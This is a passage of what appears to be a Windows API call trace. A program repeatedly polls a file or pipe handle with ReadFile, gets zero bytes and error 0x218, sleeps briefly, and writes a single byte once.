	[0211.069] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0211.069] GetLastError () returned 0x218
	[0211.069] Sleep (dwMilliseconds=0xa) 
	[0211.084] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0211.084] GetLastError () returned 0x218
	[0211.084] Sleep (dwMilliseconds=0xa) 
	[0211.100] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0211.100] GetLastError () returned 0x218
	[0211.100] Sleep (dwMilliseconds=0xa) 
	[0211.116] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0211.116] GetLastError () returned 0x218
	[0211.116] Sleep (dwMilliseconds=0xa) 
	[0211.131] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0211.131] GetLastError () returned 0x218
	[0211.131] Sleep (dwMilliseconds=0xa) 
	[0211.178] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0211.178] GetLastError () returned 0x218
	[0211.178] Sleep (dwMilliseconds=0xa) 
	[0211.226] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0211.226] GetLastError () returned 0x218
	[0211.226] Sleep (dwMilliseconds=0x3e8) 
	[0212.240] WriteFile (in: hFile=0x258, lpBuffer=0x116f4dc, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x116f4d4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x116f4d4, lpOverlapped=0x0) returned 0
	[0212.240] Sleep (dwMilliseconds=0xa) 
	[0212.256] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0212.256] GetLastError () returned 0x218
	[0212.256] Sleep (dwMilliseconds=0xa) 
	[0212.271] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0212.271] GetLastError () returned 0x218
	[0212.271] Sleep (dwMilliseconds=0xa) 
	[0212.286] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0212.286] GetLastError () returned 0x218
	[0212.286] Sleep (dwMilliseconds=0xa) 
	[0212.302] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0212.302] GetLastError () returned 0x218
	[0212.302] Sleep (dwMilliseconds=0xa) 
	[0212.349] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0212.349] GetLastError () returned 0x218
	[0212.349] Sleep (dwMilliseconds=0xa) 
	[0212.395] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0212.395] GetLastError () returned 0x218
	[0212.395] Sleep (dwMilliseconds=0xa) 
	[0212.416] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0212.416] GetLastError () returned 0x218
	[0212.417] Sleep (dwMilliseconds=0xa) 
	[0212.426] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0212.426] GetLastError () returned 0x218
	[0212.426] Sleep (dwMilliseconds=0xa) 
	[0212.442] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0212.442] GetLastError () returned 0x218
	[0212.442] Sleep (dwMilliseconds=0xa) 
	[0212.457] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0212.457] GetLastError () returned 0x218
	[0212.458] Sleep (dwMilliseconds=0xa) 
	[0212.483] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0212.483] GetLastError () returned 0x218
	[0212.483] Sleep (dwMilliseconds=0xa) 
	[0212.489] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0212.489] GetLastError () returned 0x218
	[0212.489] Sleep (dwMilliseconds=0xa) 
	[0212.505] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0212.505] GetLastError () returned 0x218
	[0212.505] Sleep (dwMilliseconds=0xa) 
	[0212.520] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0212.520] GetLastError () returned 0x218
	[0212.520] Sleep (dwMilliseconds=0xa) 
	[0212.554] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0212.554] GetLastError () returned 0x218
	[0212.554] Sleep (dwMilliseconds=0xa) 
	[0212.598] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0212.598] GetLastError () returned 0x218
	[0212.598] Sleep (dwMilliseconds=0xa) 
	[0212.648] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0212.648] GetLastError () returned 0x218
	[0212.648] Sleep (dwMilliseconds=0xa) 
	[0212.684] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0212.684] GetLastError () returned 0x218
	[0212.684] Sleep (dwMilliseconds=0xa) 
	[0212.691] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0212.691] GetLastError () returned 0x218
	[0212.691] Sleep (dwMilliseconds=0xa) 
	[0212.707] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0212.707] GetLastError () returned 0x218
	[0212.707] Sleep (dwMilliseconds=0xa) 
	[0212.724] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0212.724] GetLastError () returned 0x218
	[0212.724] Sleep (dwMilliseconds=0xa) 
	[0212.738] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0212.738] GetLastError () returned 0x218
	[0212.738] Sleep (dwMilliseconds=0xa) 
	[0212.754] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0212.754] GetLastError () returned 0x218
	[0212.754] Sleep (dwMilliseconds=0xa) 
	[0212.770] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0212.770] GetLastError () returned 0x218
	[0212.770] Sleep (dwMilliseconds=0xa) 
	[0212.785] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0212.785] GetLastError () returned 0x218
	[0212.785] Sleep (dwMilliseconds=0xa) 
	[0212.833] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0212.833] GetLastError () returned 0x218
	[0212.833] Sleep (dwMilliseconds=0xa) 
	[0212.878] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0212.878] GetLastError () returned 0x218
	[0212.878] Sleep (dwMilliseconds=0xa) 
	[0212.911] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0212.911] GetLastError () returned 0x218
	[0212.911] Sleep (dwMilliseconds=0xa) 
	[0212.939] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0212.939] GetLastError () returned 0x218
	[0212.939] Sleep (dwMilliseconds=0xa) 
	[0212.941] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0212.941] GetLastError () returned 0x218
	[0212.941] Sleep (dwMilliseconds=0xa) 
	[0212.957] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0212.957] GetLastError () returned 0x218
	[0212.957] Sleep (dwMilliseconds=0xa) 
	[0212.973] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0212.973] GetLastError () returned 0x218
	[0212.973] Sleep (dwMilliseconds=0xa) 
	[0212.988] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0212.988] GetLastError () returned 0x218
	[0212.988] Sleep (dwMilliseconds=0xa) 
	[0213.005] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0213.005] GetLastError () returned 0x218
	[0213.005] Sleep (dwMilliseconds=0xa) 
	[0213.020] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0213.020] GetLastError () returned 0x218
	[0213.020] Sleep (dwMilliseconds=0xa) 
	[0213.066] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0213.066] GetLastError () returned 0x218
	[0213.066] Sleep (dwMilliseconds=0xa) 
	[0213.112] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0213.112] GetLastError () returned 0x218
	[0213.112] Sleep (dwMilliseconds=0xa) 
	[0213.138] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0213.138] GetLastError () returned 0x218
	[0213.138] Sleep (dwMilliseconds=0xa) 
	[0213.144] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0213.144] GetLastError () returned 0x218
	[0213.144] Sleep (dwMilliseconds=0xa) 
	[0213.160] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0213.160] GetLastError () returned 0x218
	[0213.160] Sleep (dwMilliseconds=0xa) 
	[0213.176] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0213.176] GetLastError () returned 0x218
	[0213.176] Sleep (dwMilliseconds=0xa) 
	[0213.191] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0213.192] GetLastError () returned 0x218
	[0213.192] Sleep (dwMilliseconds=0xa) 
	[0213.208] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0213.208] GetLastError () returned 0x218
	[0213.208] Sleep (dwMilliseconds=0xa) 
	[0213.222] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0213.222] GetLastError () returned 0x218
	[0213.222] Sleep (dwMilliseconds=0xa) 
	[0213.237] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0213.237] GetLastError () returned 0x218
	[0213.237] Sleep (dwMilliseconds=0xa) 
	[0213.285] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0213.285] GetLastError () returned 0x218
	[0213.285] Sleep (dwMilliseconds=0xa) 
	[0213.331] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0213.331] GetLastError () returned 0x218
	[0213.331] Sleep (dwMilliseconds=0xa) 
	[0213.363] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0213.363] GetLastError () returned 0x218
	[0213.363] Sleep (dwMilliseconds=0xa) 
	[0213.378] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0213.378] GetLastError () returned 0x218
	[0213.378] Sleep (dwMilliseconds=0xa) 
	[0213.393] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0213.393] GetLastError () returned 0x218
	[0213.394] Sleep (dwMilliseconds=0xa) 
	[0213.409] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0213.409] GetLastError () returned 0x218
	[0213.409] Sleep (dwMilliseconds=0xa) 
	[0213.425] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0213.425] GetLastError () returned 0x218
	[0213.425] Sleep (dwMilliseconds=0xa) 
	[0213.440] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0213.440] GetLastError () returned 0x218
	[0213.440] Sleep (dwMilliseconds=0xa) 
	[0213.456] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0213.456] GetLastError () returned 0x218
	[0213.456] Sleep (dwMilliseconds=0xa) 
	[0213.472] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0213.472] GetLastError () returned 0x218
	[0213.472] Sleep (dwMilliseconds=0xa) 
	[0213.526] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0213.526] GetLastError () returned 0x218
	[0213.526] Sleep (dwMilliseconds=0xa) 
	[0213.565] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0213.565] GetLastError () returned 0x218
	[0213.565] Sleep (dwMilliseconds=0xa) 
	[0213.592] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0213.592] GetLastError () returned 0x218
	[0213.592] Sleep (dwMilliseconds=0xa) 
	[0213.596] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0213.596] GetLastError () returned 0x218
	[0213.596] Sleep (dwMilliseconds=0xa) 
	[0213.623] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0213.623] GetLastError () returned 0x218
	[0213.623] Sleep (dwMilliseconds=0xa) 
	[0213.627] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0213.627] GetLastError () returned 0x218
	[0213.627] Sleep (dwMilliseconds=0xa) 
	[0213.643] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0213.643] GetLastError () returned 0x218
	[0213.643] Sleep (dwMilliseconds=0xa) 
	[0213.658] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0213.658] GetLastError () returned 0x218
	[0213.658] Sleep (dwMilliseconds=0xa) 
	[0213.674] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0213.674] GetLastError () returned 0x218
	[0213.674] Sleep (dwMilliseconds=0xa) 
	[0213.690] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0213.690] GetLastError () returned 0x218
	[0213.690] Sleep (dwMilliseconds=0xa) 
	[0213.737] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0213.737] GetLastError () returned 0x218
	[0213.737] Sleep (dwMilliseconds=0xa) 
	[0213.783] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0213.783] GetLastError () returned 0x218
	[0213.783] Sleep (dwMilliseconds=0xa) 
	[0213.805] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0213.806] GetLastError () returned 0x218
	[0213.806] Sleep (dwMilliseconds=0xa) 
